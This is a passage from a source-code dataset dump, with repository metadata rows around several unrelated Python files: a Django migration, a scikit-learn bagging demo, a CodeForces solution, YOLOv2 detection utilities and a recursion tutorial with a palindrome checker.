tags.append(tags_list[random.randrange(0, len(tags_list))])
else:
tags.append(self.word())
return ','.join(tags)
| [
"ec2-user@ip-172-31-20-100.us-east-2.compute.internal"
] | ec2-user@ip-172-31-20-100.us-east-2.compute.internal |
4944013970022784952c3f3c979c04980c1ff25f | bc404af610ca8cd55222c5983f15592e284e25c6 | /car/migrations/0004_auto_20200814_1432.py | 34436eb0082a73f4f654ac96b37f53b23d44e02e | [] | no_license | mmgl/DjangoCars | a748cc29f44ab9bc9d093b56835c2760bae902f6 | 841f5c1a038a422115a899d825ddc182e263bc0c | refs/heads/master | 2022-12-06T19:04:54.505371 | 2020-08-23T22:12:33 | 2020-08-23T22:12:33 | 280,905,038 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | # Generated by Django 3.0.8 on 2020-08-14 11:32
import ckeditor_uploader.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('car', '0003_images'),
]
operations = [
migrations.AlterField(
model_name='car',
name='detail',
field=ckeditor_uploader.fields.RichTextUploadingField(blank=True),
),
]
| [
"muhammedmustafagull@gmail.com"
] | muhammedmustafagull@gmail.com |
259e4f08f748d01aa87961620832501edc5c97b5 | 473c5ab1373df90836a5ce127f7c71209464603b | /Machine learning/Decision Tree/12.6.Bagging.py | 36cd3cff03c4749b86a734d97d994af5049f39d5 | [] | no_license | LN512/hello-liu | 025b7f47e8070fd0290b413a92721829fc30576d | 77c94870af9a0b66d6b0f179a61a760fe0985f6f | refs/heads/master | 2021-06-16T12:52:08.171134 | 2021-01-12T01:25:09 | 2021-01-12T01:25:09 | 89,233,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,988 | py | # /usr/bin/python
# -*- encoding:utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
from sklearn.linear_model import RidgeCV
from sklearn.ensemble import BaggingRegressor
from sklearn.tree import DecisionTreeRegressor
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures
def f(x):
return 0.5*np.exp(-(x+3) **2) + np.exp(-x**2) + + 0.5*np.exp(-(x-3) ** 2)
if __name__ == "__main__":
np.random.seed(0)
N = 200
x = np.random.rand(N) * 10 - 5 # [-5,5)
x = np.sort(x)
y = f(x) + 0.05*np.random.randn(N)
x.shape = -1, 1
ridge = RidgeCV(alphas=np.logspace(-3, 2, 10), fit_intercept=False)
ridged = Pipeline([('poly', PolynomialFeatures(degree=10)), ('Ridge', ridge)])
bagging_ridged = BaggingRegressor(ridged, n_estimators=100, max_samples=0.3)
dtr = DecisionTreeRegressor(max_depth=5)
regs = [
('DecisionTree Regressor', dtr),
('Ridge Regressor(6 Degree)', ridged),
('Bagging Ridge(6 Degree)', bagging_ridged),
('Bagging DecisionTree Regressor', BaggingRegressor(dtr, n_estimators=100, max_samples=0.3))]
x_test = np.linspace(1.1*x.min(), 1.1*x.max(), 1000)
mpl.rcParams['font.sans-serif'] = [u'SimHei']
mpl.rcParams['axes.unicode_minus'] = False
plt.figure(figsize=(12, 8), facecolor='w')
plt.plot(x, y, 'ro', label=u'训练数据')
plt.plot(x_test, f(x_test), color='k', lw=3.5, label=u'真实值')
clrs = 'bmyg'
for i, (name, reg) in enumerate(regs):
reg.fit(x, y)
y_test = reg.predict(x_test.reshape(-1, 1))
plt.plot(x_test, y_test.ravel(), color=clrs[i], lw=i+1, label=name, zorder=6-i)
plt.legend(loc='upper left')
plt.xlabel('X', fontsize=15)
plt.ylabel('Y', fontsize=15)
plt.title(u'回归曲线拟合', fontsize=21)
plt.ylim((-0.2, 1.2))
plt.tight_layout(2)
plt.grid(True)
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
dd1d15c77bbed78ecbb276388312c71711b89b76 | 20bb1ae805cd796a7c377e55966633441d1d9fd5 | /CodeForces/Problems/887B Cubes for Masha/cubes.py | 7e511bea378f4a51b6295ec6b24c35eb89ef6910 | [] | no_license | nathantheinventor/solved-problems | 1791c9588aefe2ebdc9293eb3d58317346d88e83 | c738e203fa77ae931b0ec613e5a00f9a8f7ff845 | refs/heads/master | 2022-10-27T08:58:23.860159 | 2022-10-13T20:18:43 | 2022-10-13T20:18:43 | 122,110,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 972 | py | cubes = [input().split() for _ in range(int(input()))]
def canMake(s):
    """Return True if the digit string s (length 1-3) can be displayed
    using pairwise-distinct cubes, one digit per cube.

    Reads the module-level `cubes` list (one list of face digits per cube).
    """
    if len(s) == 1:
        return any(s in cube for cube in cubes)
    elif len(s) == 2:
        # First digit on cube i, second digit on any other cube.
        for i, first_cube in enumerate(cubes):
            if s[0] not in first_cube:
                continue
            if any(j != i and s[1] in second_cube
                   for j, second_cube in enumerate(cubes)):
                return True
        return False
    elif len(s) == 3:
        # Three pairwise-distinct cubes, one per digit.
        for i, first_cube in enumerate(cubes):
            if s[0] not in first_cube:
                continue
            for j, second_cube in enumerate(cubes):
                if j == i or s[1] not in second_cube:
                    continue
                if any(k != i and k != j and s[2] in third_cube
                       for k, third_cube in enumerate(cubes)):
                    return True
        return False
# Find the largest x such that every natural number 1..x can be shown.
if not canMake("1"):
    print(0)
else:
    for i in range(1, 1000):
        if not canMake(str(i)):
            print(i - 1)
            break
    else:
        # Bug fix: with three cubes the largest displayable number is 999;
        # the original printed nothing when every value up to 999 was
        # makeable. The for-else runs only when the loop never breaks.
        print(999)
"nathantheinventor@gmail.com"
] | nathantheinventor@gmail.com |
07c2f1b1292181ff3cb89e02ba4f326110af2ecc | b9b701d6661af48c19411b355a4d3da51e184d0b | /79-zgz-pytorch-yolo2-master/utils.py | 64aebf3db02515f8bd0b6b61b89f2929046ffa19 | [] | no_license | TzuRen/APDM_REM | 4099adc27dc82280b566408ba3827e8bf8df4634 | 5fbe8202aa5677a1d82302246d0260671681c4f7 | refs/heads/master | 2022-11-03T03:46:59.785270 | 2020-06-15T11:01:19 | 2020-06-15T11:01:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,400 | py | #encoding=utf-8
import sys
import os
import time
import math
import torch
import numpy as np
from PIL import Image, ImageDraw, ImageFont
from torch.autograd import Variable
import struct # get_image_size
import imghdr # get_image_size
def sigmoid(x):
    """Logistic sigmoid: 1 / (1 + e^-x)."""
    return 1.0 / (1.0 + math.exp(-x))
def softmax(x):
    """Numerically stable softmax over all elements of tensor x."""
    # Subtracting the global max keeps exp() from overflowing; the
    # normalized result is unchanged.
    shifted = torch.exp(x - torch.max(x))
    return shifted / shifted.sum()
def bbox_iou(box1, box2, x1y1x2y2=True):
    """Intersection-over-union of two boxes.

    Boxes are [x1, y1, x2, y2] corners when x1y1x2y2=True, otherwise
    [cx, cy, w, h] center format. Returns 0.0 for non-overlapping boxes.
    """
    if x1y1x2y2:
        # Corner format: union extremes and sizes straight from coordinates.
        union_left = min(box1[0], box2[0])
        union_right = max(box1[2], box2[2])
        union_top = min(box1[1], box2[1])
        union_bottom = max(box1[3], box2[3])
        w1 = box1[2] - box1[0]
        h1 = box1[3] - box1[1]
        w2 = box2[2] - box2[0]
        h2 = box2[3] - box2[1]
    else:
        # Center format: extremes of the merged span from center +/- half-size.
        union_left = min(box1[0] - box1[2] / 2.0, box2[0] - box2[2] / 2.0)
        union_right = max(box1[0] + box1[2] / 2.0, box2[0] + box2[2] / 2.0)
        union_top = min(box1[1] - box1[3] / 2.0, box2[1] - box2[3] / 2.0)
        union_bottom = max(box1[1] + box1[3] / 2.0, box2[1] + box2[3] / 2.0)
        w1 = box1[2]
        h1 = box1[3]
        w2 = box2[2]
        h2 = box2[3]
    # Intersection extent = sum of sizes minus the union's bounding extent;
    # non-positive means the boxes are disjoint along that axis.
    cw = w1 + w2 - (union_right - union_left)
    ch = h1 + h2 - (union_bottom - union_top)
    if cw <= 0 or ch <= 0:
        return 0.0
    carea = cw * ch
    uarea = w1 * h1 + w2 * h2 - carea
    return carea / uarea
def bbox_ious(boxes1, boxes2, x1y1x2y2=True):
    """Vectorized element-wise IoU between two equally-shaped sets of boxes.

    boxes1/boxes2: tensors whose first dimension indexes the four box
    coordinates (corners [x1, y1, x2, y2] when x1y1x2y2=True, center format
    [cx, cy, w, h] otherwise); the remaining dimensions index the boxes.
    Returns a tensor of IoU values with 0 where a pair does not overlap.
    """
    if x1y1x2y2:
        # Union extremes and per-box sizes (corner format).
        mx = torch.min(boxes1[0], boxes2[0])
        Mx = torch.max(boxes1[2], boxes2[2])
        my = torch.min(boxes1[1], boxes2[1])
        My = torch.max(boxes1[3], boxes2[3])
        w1 = boxes1[2] - boxes1[0]
        h1 = boxes1[3] - boxes1[1]
        w2 = boxes2[2] - boxes2[0]
        h2 = boxes2[3] - boxes2[1]
    else:
        # Center format: extremes from center +/- half-size.
        mx = torch.min(boxes1[0]-boxes1[2]/2.0, boxes2[0]-boxes2[2]/2.0)
        Mx = torch.max(boxes1[0]+boxes1[2]/2.0, boxes2[0]+boxes2[2]/2.0)
        my = torch.min(boxes1[1]-boxes1[3]/2.0, boxes2[1]-boxes2[3]/2.0)
        My = torch.max(boxes1[1]+boxes1[3]/2.0, boxes2[1]+boxes2[3]/2.0)
        w1 = boxes1[2]
        h1 = boxes1[3]
        w2 = boxes2[2]
        h2 = boxes2[3]
    # Intersection extent = sum of sizes minus the union's bounding extent.
    uw = Mx - mx
    uh = My - my
    cw = w1 + w2 - uw
    ch = h1 + h2 - uh
    # mask marks pairs that are disjoint along either axis (the '+' on the
    # boolean tensors acts as an element-wise OR).
    mask = ((cw <= 0) + (ch <= 0) > 0)
    area1 = w1 * h1
    area2 = w2 * h2
    carea = cw * ch
    # Zero out intersection area for disjoint pairs before computing IoU.
    carea[mask] = 0
    uarea = area1 + area2 - carea
    return carea/uarea
def nms(boxes, nms_thresh):
    """Greedy non-maximum suppression over a list of detection boxes.

    Each box is [cx, cy, w, h, det_conf, ...] (center format, index 4 is the
    detection confidence). Boxes are visited in descending confidence order;
    any lower-confidence box overlapping a kept box with IoU > nms_thresh is
    suppressed.

    NOTE: suppression is done by writing box[4] = 0, so this mutates the
    input boxes in place.
    """
    if len(boxes) == 0:
        return boxes
    # Sorting 1 - conf ascending == sorting confidence descending.
    det_confs = torch.zeros(len(boxes))
    for i in range(len(boxes)):
        det_confs[i] = 1-boxes[i][4]
    _,sortIds = torch.sort(det_confs)
    out_boxes = []
    for i in range(len(boxes)):
        box_i = boxes[sortIds[i]]
        # Confidence 0 means this box was suppressed by an earlier one.
        if box_i[4] > 0:
            out_boxes.append(box_i)
            for j in range(i+1, len(boxes)):
                box_j = boxes[sortIds[j]]
                if bbox_iou(box_i, box_j, x1y1x2y2=False) > nms_thresh:
                    #print(box_i, box_j, bbox_iou(box_i, box_j, x1y1x2y2=False))
                    box_j[4] = 0
    return out_boxes
def convert2cpu(gpu_matrix):
    """Copy a (possibly GPU) tensor into a fresh CPU FloatTensor of the
    same size."""
    cpu_matrix = torch.FloatTensor(gpu_matrix.size())
    return cpu_matrix.copy_(gpu_matrix)
def convert2cpu_long(gpu_matrix):
    """Copy a (possibly GPU) tensor into a fresh CPU LongTensor of the
    same size."""
    cpu_matrix = torch.LongTensor(gpu_matrix.size())
    return cpu_matrix.copy_(gpu_matrix)
def get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors, only_objectness=1, validation=False):
    """Decode a YOLOv2 region-layer output tensor into detection boxes.

    Args:
        output: network output of shape (batch, (5+num_classes)*num_anchors,
            h, w); a 3-D tensor is treated as a single-image batch.
        conf_thresh: keep predictions whose confidence exceeds this value.
        num_classes: number of object classes.
        anchors: flat list of anchor sizes (width, height pairs).
        num_anchors: number of anchor boxes per grid cell.
        only_objectness: if truthy, threshold on objectness alone; otherwise
            on objectness * best class probability.
        validation: if True, additionally append every other (conf, class)
            pair that clears the threshold to each box.

    Returns:
        A list with one entry per batch image; each entry is a list of boxes
        [bcx, bcy, bw, bh, det_conf, cls_max_conf, cls_max_id] with center
        and size normalized by the grid dimensions.

    NOTE(review): grid/anchor tensors are created with .cuda(), so a CUDA
    device is required.
    """
    # Bug fix: '//' keeps anchor_step an int under Python 3; the original
    # '/' yields a float there, which breaks the .view() calls below.
    anchor_step = len(anchors) // num_anchors
    if output.dim() == 3:
        output = output.unsqueeze(0)
    batch = output.size(0)
    assert(output.size(1) == (5+num_classes)*num_anchors)
    h = output.size(2)
    w = output.size(3)

    t0 = time.time()
    all_boxes = []
    # Flatten to (5+num_classes, batch*num_anchors*h*w) so each prediction
    # component can be transformed with one vectorized operation.
    output = output.view(batch*num_anchors, 5+num_classes, h*w).transpose(0,1).contiguous().view(5+num_classes, batch*num_anchors*h*w)

    # Box centers: sigmoid(tx)/sigmoid(ty) offset by the cell coordinates.
    grid_x = torch.linspace(0, w-1, w).repeat(h,1).repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).cuda()
    grid_y = torch.linspace(0, h-1, h).repeat(w,1).t().repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).cuda()
    xs = torch.sigmoid(output[0]) + grid_x
    ys = torch.sigmoid(output[1]) + grid_y

    # Box sizes: exp(tw)/exp(th) scaled by the per-anchor width/height.
    anchor_w = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([0]))
    anchor_h = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([1]))
    anchor_w = anchor_w.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).cuda()
    anchor_h = anchor_h.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).cuda()
    ws = torch.exp(output[2]) * anchor_w
    hs = torch.exp(output[3]) * anchor_h

    det_confs = torch.sigmoid(output[4])

    # Per-prediction class distribution and its argmax.
    cls_confs = torch.nn.Softmax()(Variable(output[5:5+num_classes].transpose(0,1))).data
    cls_max_confs, cls_max_ids = torch.max(cls_confs, 1)
    cls_max_confs = cls_max_confs.view(-1)
    cls_max_ids = cls_max_ids.view(-1)
    t1 = time.time()

    sz_hw = h*w
    sz_hwa = sz_hw*num_anchors
    # Move everything to the CPU once, before the per-box Python loop.
    det_confs = convert2cpu(det_confs)
    cls_max_confs = convert2cpu(cls_max_confs)
    cls_max_ids = convert2cpu_long(cls_max_ids)
    xs = convert2cpu(xs)
    ys = convert2cpu(ys)
    ws = convert2cpu(ws)
    hs = convert2cpu(hs)
    if validation:
        cls_confs = convert2cpu(cls_confs.view(-1, num_classes))
    t2 = time.time()
    for b in range(batch):
        boxes = []
        for cy in range(h):
            for cx in range(w):
                for i in range(num_anchors):
                    ind = b*sz_hwa + i*sz_hw + cy*w + cx
                    det_conf = det_confs[ind]
                    if only_objectness:
                        conf = det_confs[ind]
                    else:
                        conf = det_confs[ind] * cls_max_confs[ind]

                    if conf > conf_thresh:
                        bcx = xs[ind]
                        bcy = ys[ind]
                        bw = ws[ind]
                        bh = hs[ind]
                        cls_max_conf = cls_max_confs[ind]
                        cls_max_id = cls_max_ids[ind]
                        # Normalize center/size by the grid dimensions.
                        box = [bcx/w, bcy/h, bw/w, bh/h, det_conf, cls_max_conf, cls_max_id]
                        if (not only_objectness) and validation:
                            # Also keep any other classes clearing the threshold.
                            for c in range(num_classes):
                                tmp_conf = cls_confs[ind][c]
                                if c != cls_max_id and det_confs[ind]*tmp_conf > conf_thresh:
                                    box.append(tmp_conf)
                                    box.append(c)
                        boxes.append(box)
        all_boxes.append(boxes)
    t3 = time.time()
    if False:
        # Flip to True for a timing breakdown of the decode stages.
        print('---------------------------------')
        print('matrix computation : %f' % (t1-t0))
        print('        gpu to cpu : %f' % (t2-t1))
        print('      boxes filter : %f' % (t3-t2))
        print('---------------------------------')
    return all_boxes
def plot_boxes_cv2(img, boxes, savename=None, class_names=None, color=None):
    """Draw detection boxes on an OpenCV image and optionally save it.

    img: numpy image (height x width x channels, as produced by cv2).
    boxes: [cx, cy, w, h, det_conf, cls_conf, cls_id, ...] with coordinates
    normalized to [0, 1]. When class_names is given, the class label is
    printed and drawn; box color is `color` if given, otherwise a
    deterministic per-class color. Returns the annotated image.
    """
    import cv2
    colors = torch.FloatTensor([[1,0,1],[0,0,1],[0,1,1],[0,1,0],[1,1,0],[1,0,0]]);
    def get_color(c, x, max_val):
        # Interpolate channel c along the 6-entry palette above.
        ratio = float(x)/max_val * 5
        i = int(math.floor(ratio))
        j = int(math.ceil(ratio))
        ratio = ratio - i
        r = (1-ratio) * colors[i][c] + ratio*colors[j][c]
        return int(r*255)
    width = img.shape[1]
    height = img.shape[0]
    for i in range(len(boxes)):
        box = boxes[i]
        # Convert normalized center/size to pixel corner coordinates.
        x1 = int(round((box[0] - box[2]/2.0) * width))
        y1 = int(round((box[1] - box[3]/2.0) * height))
        x2 = int(round((box[0] + box[2]/2.0) * width))
        y2 = int(round((box[1] + box[3]/2.0) * height))

        if color:
            rgb = color
        else:
            rgb = (255, 0, 0)
        if len(box) >= 7 and class_names:
            cls_conf = box[5]
            cls_id = box[6]
            print('%s: %f' % (class_names[cls_id], cls_conf))
            # Deterministic per-class color unless an explicit one was given.
            classes = len(class_names)
            offset = cls_id * 123457 % classes
            red = get_color(2, offset, classes)
            green = get_color(1, offset, classes)
            blue = get_color(0, offset, classes)
            if color is None:
                rgb = (red, green, blue)
            img = cv2.putText(img, class_names[cls_id], (x1,y1), cv2.FONT_HERSHEY_SIMPLEX, 1.2, rgb, 1)
        img = cv2.rectangle(img, (x1,y1), (x2,y2), rgb, 1)
    if savename:
        print("save plot results to %s" % savename)
        cv2.imwrite(savename, img)
    return img
def plot_boxes(img, boxes, savename=None, class_names=None):
    """Draw detection boxes on a PIL image and optionally save it.

    boxes: [cx, cy, w, h, det_conf, cls_conf, cls_id, ...] with coordinates
    normalized to [0, 1]. Class labels are drawn in a deterministic
    per-class color when class_names is given. Returns the annotated image
    (drawn in place on img).
    """
    colors = torch.FloatTensor([[1,0,1],[0,0,1],[0,1,1],[0,1,0],[1,1,0],[1,0,0]]);
    def get_color(c, x, max_val):
        # Interpolate channel c along the 6-entry palette above.
        ratio = float(x)/max_val * 5
        i = int(math.floor(ratio))
        j = int(math.ceil(ratio))
        ratio = ratio - i
        r = (1-ratio) * colors[i][c] + ratio*colors[j][c]
        return int(r*255)
    width = img.width
    height = img.height
    draw = ImageDraw.Draw(img)
    for i in range(len(boxes)):
        box = boxes[i]
        # Convert normalized center/size to pixel corner coordinates.
        x1 = (box[0] - box[2]/2.0) * width
        y1 = (box[1] - box[3]/2.0) * height
        x2 = (box[0] + box[2]/2.0) * width
        y2 = (box[1] + box[3]/2.0) * height
        rgb = (255, 0, 0)
        if len(box) >= 7 and class_names:
            cls_conf = box[5]
            cls_id = box[6]
            print('%s: %f' % (class_names[cls_id], cls_conf))
            # Deterministic per-class color.
            classes = len(class_names)
            offset = cls_id * 123457 % classes
            red = get_color(2, offset, classes)
            green = get_color(1, offset, classes)
            blue = get_color(0, offset, classes)
            rgb = (red, green, blue)
            draw.text((x1, y1), class_names[cls_id], fill=rgb)
        draw.rectangle([x1, y1, x2, y2], outline = rgb)
    if savename:
        print("save plot results to %s" % savename)
        img.save(savename)
    return img
def my_plot_boxes(img, boxes, savedir, class_names,patch_size):
    """Annotate detections on a PIL image and save random patches cropped
    from inside each sufficiently large detection box.

    boxes: [cx, cy, w, h, det_conf, cls_conf, cls_id, ...] with coordinates
    normalized to [0, 1]. For each labeled box larger than patch_size
    (assumed (patch_w, patch_h) in pixels — TODO confirm), 7 patches are
    cropped around the box center and saved under savedir as
    "<class>_<w>_<h>_<rnd>.png". Returns the (partially annotated) image.
    """
    colors = torch.FloatTensor([[1,0,1],[0,0,1],[0,1,1],[0,1,0],[1,1,0],[1,0,0]]);
    def get_color(c, x, max_val):
        # Interpolate channel c along the 6-entry palette above.
        ratio = float(x)/max_val * 5
        i = int(math.floor(ratio))
        j = int(math.ceil(ratio))
        ratio = ratio - i
        r = (1-ratio) * colors[i][c] + ratio*colors[j][c]
        return int(r*255)
    width = img.width
    height = img.height
    draw = ImageDraw.Draw(img)
    for i in range(len(boxes)):
        box = boxes[i]
        # Convert normalized center/size to pixel corner coordinates.
        x1 = (box[0] - box[2]/2.0) * width
        y1 = (box[1] - box[3]/2.0) * height
        x2 = (box[0] + box[2]/2.0) * width
        y2 = (box[1] + box[3]/2.0) * height
        rgb = (255, 0, 0)
        if len(box) >= 7 and class_names:
            cls_conf = box[5]
            cls_id = box[6]
            print('%s: %f' % (class_names[cls_id], cls_conf))
            classes = len(class_names)
            offset = cls_id * 123457 % classes
            red = get_color(2, offset, classes)
            green = get_color(1, offset, classes)
            blue = get_color(0, offset, classes)
            rgb = (red, green, blue)
            draw.text((x1, y1), class_names[cls_id], fill=rgb)
            #draw.rectangle([x1, y1, x2, y2], outline = rgb)
            if (x2-x1)>patch_size[0] and (y2-y1)>patch_size[1]: # ensure the cropped patch fits inside the detected box
                center_x=(x2-x1)/2+x1
                center_y=(y2-y1)/2+y1
                # NOTE(review): this inner loop reuses the name `i`, shadowing
                # the outer box index (harmless here since the outer `i` is
                # not used again within an iteration).
                for i in range(7):
                    start_x=np.random.randint(center_x-patch_size[0]/10,center_x+patch_size[0]/10) # random crop center near the box center
                    start_y=np.random.randint(center_y-patch_size[1]/10,center_y+patch_size[1]/10)
                    box=(start_x-patch_size[0]/2,start_y-patch_size[1]/2,start_x+patch_size[0]/2,start_y+patch_size[1]/2)
                    pic_patch=img.crop(box)
                    rnd=np.random.randint(0,10000) # random suffix only to distinguish saved filenames
                    pic_patch.save(savedir+class_names[cls_id]+'_'+str(patch_size[0])+'_'+str(patch_size[1])+'_'+str(rnd)+'.png')
    # if savename:
    #     print("save plot results to %s" % savename)
    #     img.save(savename)
    return img
def read_truths(lab_path):
    """Load ground-truth annotations from *lab_path* as an (n, 5) array.

    Each truth row holds 5 numbers (class id plus a normalized box).
    Returns an empty array when the file is missing or empty.
    """
    if not os.path.exists(lab_path):
        return np.array([])
    if os.path.getsize(lab_path):
        truths = np.loadtxt(lab_path)
        # Integer division is required here: `truths.size / 5` is a float in
        # Python 3 and makes reshape raise. The reshape also promotes a file
        # holding a single truth (1-D result from loadtxt) to a 2-D array.
        truths = truths.reshape(truths.size // 5, 5)
        return truths
    else:
        return np.array([])
def read_truths_args(lab_path, min_box_scale):
    """Load ground-truth boxes, keeping only rows whose width (column 3)
    is at least *min_box_scale*."""
    truths = read_truths(lab_path)
    kept = [list(row[:5]) for row in truths if row[3] >= min_box_scale]
    return np.array(kept)
def load_class_names(namesfile):
    """Read *namesfile* and return one class name per line, with trailing
    whitespace (including the newline) stripped."""
    with open(namesfile, 'r') as fp:
        return [line.rstrip() for line in fp.readlines()]
def image2torch(img):
    """Convert an RGB PIL-style image into a (1, 3, H, W) float tensor
    with byte values scaled into [0, 1]."""
    w, h = img.width, img.height
    raw = torch.ByteTensor(torch.ByteStorage.from_buffer(img.tobytes()))
    # HWC byte buffer -> CHW layout, then add the batch dimension.
    chw = raw.view(h, w, 3).permute(2, 0, 1).contiguous()
    return chw.view(1, 3, h, w).float().div(255.0)
def do_detect(model, img, conf_thresh, nms_thresh, use_cuda=1):
    """Run one forward pass of *model* on *img* and return NMS-filtered boxes.

    model: detector exposing eval(), num_classes, anchors and num_anchors.
    img: a PIL image or an OpenCV-style HxWxC numpy array; any other type
        aborts the process.
    conf_thresh / nms_thresh: confidence and NMS thresholds.
    use_cuda: truthy to move the input onto the GPU.
    """
    model.eval()
    t0 = time.time()
    if isinstance(img, Image.Image):
        w, h = img.width, img.height
        tensor = torch.ByteTensor(torch.ByteStorage.from_buffer(img.tobytes()))
        tensor = tensor.view(h, w, 3).transpose(0,1).transpose(0,2).contiguous()
        img = tensor.view(1, 3, h, w).float().div(255.0)
    elif type(img) == np.ndarray:  # cv2 image: HWC -> CHW plus batch dim
        img = torch.from_numpy(img.transpose(2,0,1)).float().div(255.0).unsqueeze(0)
    else:
        print("unknow image type")
        exit(-1)
    t1 = time.time()
    if use_cuda:
        img = img.cuda()
    img = torch.autograd.Variable(img)
    t2 = time.time()
    output = model(img)
    output = output.data
    t3 = time.time()
    boxes = get_region_boxes(output, conf_thresh, model.num_classes, model.anchors, model.num_anchors)[0]
    t4 = time.time()
    boxes = nms(boxes, nms_thresh)
    t5 = time.time()
    if False:  # flip to True for per-stage timing output
        print('-----------------------------------')
        print(' image to tensor : %f' % (t1 - t0))
        print(' tensor to cuda : %f' % (t2 - t1))
        print('         predict : %f' % (t3 - t2))
        print('get_region_boxes : %f' % (t4 - t3))
        print('             nms : %f' % (t5 - t4))
        print('           total : %f' % (t5 - t0))
        print('-----------------------------------')
    return boxes
def read_data_cfg(datacfg):
    """Parse a darknet-style ``key=value`` data config file into a dict.

    Blank lines and any line containing '#' are skipped (the original
    convention: '#' anywhere marks a comment line). 'gpus' and
    'num_workers' get defaults that the file may override. All keys and
    values are returned as stripped strings.
    """
    options = dict()
    options['gpus'] = '0,1,2,3'
    options['num_workers'] = '10'
    with open(datacfg, 'r') as fp:
        for line in fp:
            line = line.strip()
            if line == '' or '#' in line:
                continue
            # Split on the first '=' only, so values may themselves
            # contain '=' (the original split() raised ValueError there).
            key, value = line.split('=', 1)
            key = key.strip()
            value = value.strip()
            options[key] = value
    return options
def scale_bboxes(bboxes, width, height):
    """Return a deep copy of *bboxes* with the first four entries of each
    box scaled from normalized units to absolute pixels; any further
    entries (e.g. confidences) are preserved untouched."""
    from copy import deepcopy
    scaled = deepcopy(bboxes)
    for det in scaled:
        det[0] = det[0] * width
        det[1] = det[1] * height
        det[2] = det[2] * width
        det[3] = det[3] * height
    return scaled
def file_lines(thefilepath):
    """Count newline characters in the file at *thefilepath*.

    Reads in 8 MB chunks so arbitrarily large files use bounded memory.
    The file is opened in binary mode, so the count must use a bytes
    pattern — the original passed the str ``'\\n'``, which raises
    TypeError on Python 3. A ``with`` block guarantees the handle is
    closed even if a read fails.
    """
    count = 0
    with open(thefilepath, 'rb') as thefile:
        while True:
            buffer = thefile.read(8192*1024)
            if not buffer:
                break
            count += buffer.count(b'\n')
    return count
def get_image_size(fname):
    '''Determine the image type of fhandle and return its size.
    from draco

    Returns (width, height) for PNG, GIF and JPEG files, or None when the
    file is too short, of an unsupported type, or malformed.
    '''
    with open(fname, 'rb') as fhandle:
        head = fhandle.read(24)
        if len(head) != 24:
            return
        if imghdr.what(fname) == 'png':
            # Bytes 4-8 of a PNG are the tail of the signature (\r\n\x1a\n).
            check = struct.unpack('>i', head[4:8])[0]
            if check != 0x0d0a1a0a:
                return
            # IHDR width/height live at offsets 16 and 20, big-endian.
            width, height = struct.unpack('>ii', head[16:24])
        elif imghdr.what(fname) == 'gif':
            # GIF logical screen size: little-endian shorts at offset 6.
            width, height = struct.unpack('<HH', head[6:10])
        elif imghdr.what(fname) == 'jpeg' or imghdr.what(fname) == 'jpg':
            try:
                fhandle.seek(0) # Read 0xff next
                size = 2
                ftype = 0
                # Walk the JPEG segment chain until a SOFn marker (0xC0-0xCF),
                # which carries the frame dimensions.
                while not 0xc0 <= ftype <= 0xcf:
                    fhandle.seek(size, 1)
                    byte = fhandle.read(1)
                    while ord(byte) == 0xff:
                        byte = fhandle.read(1)
                    ftype = ord(byte)
                    size = struct.unpack('>H', fhandle.read(2))[0] - 2
                # We are at a SOFn block
                fhandle.seek(1, 1) # Skip `precision' byte.
                height, width = struct.unpack('>HH', fhandle.read(4))
            except Exception: #IGNORE:W0703
                # Truncated/corrupt JPEG: report no size rather than raise.
                return
        else:
            return
    return width, height
def logging(message):
    """Print *message* prefixed with the current local 'YYYY-MM-DD HH:MM:SS'
    timestamp. (Note: the name shadows the stdlib ``logging`` module.)"""
    timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
    print('%s %s' % (timestamp, message))
| [
"18765330178@163.com"
] | 18765330178@163.com |
9dcf040005180edb2313c6d17b6c9fa1e1b66bc2 | 74be65db9505041017863eb7b880cd4420164913 | /Recursion.py | 0e868ceb13e34f19e3173fef73234f70ee1de844 | [] | no_license | jackx99/Python-Tutorial | 4dd21d7993376fd8e96e9f62ef0d2c2b80c8b8bf | 0fcdc529094dbebc675dde84847d8c285b536fe3 | refs/heads/master | 2022-07-02T19:23:07.894768 | 2020-05-09T03:14:14 | 2020-05-09T03:14:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,424 | py | # Hello Guys
# When you already know how to solve a problem iteratively (while loop, for-in loop),
# there is another way: recursion.
# Recursion is the process of solving a problem by reducing it to successively
# smaller versions of itself — the code executes on ever-smaller chunks.
# A recursive definition has:
#   - one or more base case(s); the base case stops the recursion
#   - a general case that must eventually reduce to a base case
"""
A palindrome is a string that reads the same both forward and backward. For example,
the string "madam" is a palindrome. Write a program that uses a recursive method to check
whether a string is a palindrome. Your program must contain a value-returning recursive method
that returns true if the string is a palindrome and false otherwise.
Use appropriate parameters in your method.
"""
def is_palindrome(word):
    """Return True when *word* reads the same forwards and backwards.

    Base case: strings of length 0 or 1 are palindromes. General case:
    the outer characters must match, then recurse on the inner substring.
    """
    if len(word) <= 1:
        return True
    if word[0] != word[-1]:
        return False
    return is_palindrome(word[1:-1])
# Demo: check a sample word and print whether it is a palindrome.
word = "level"
print(is_palindrome(word))
"geek.mohsen@gmail.com"
] | geek.mohsen@gmail.com |
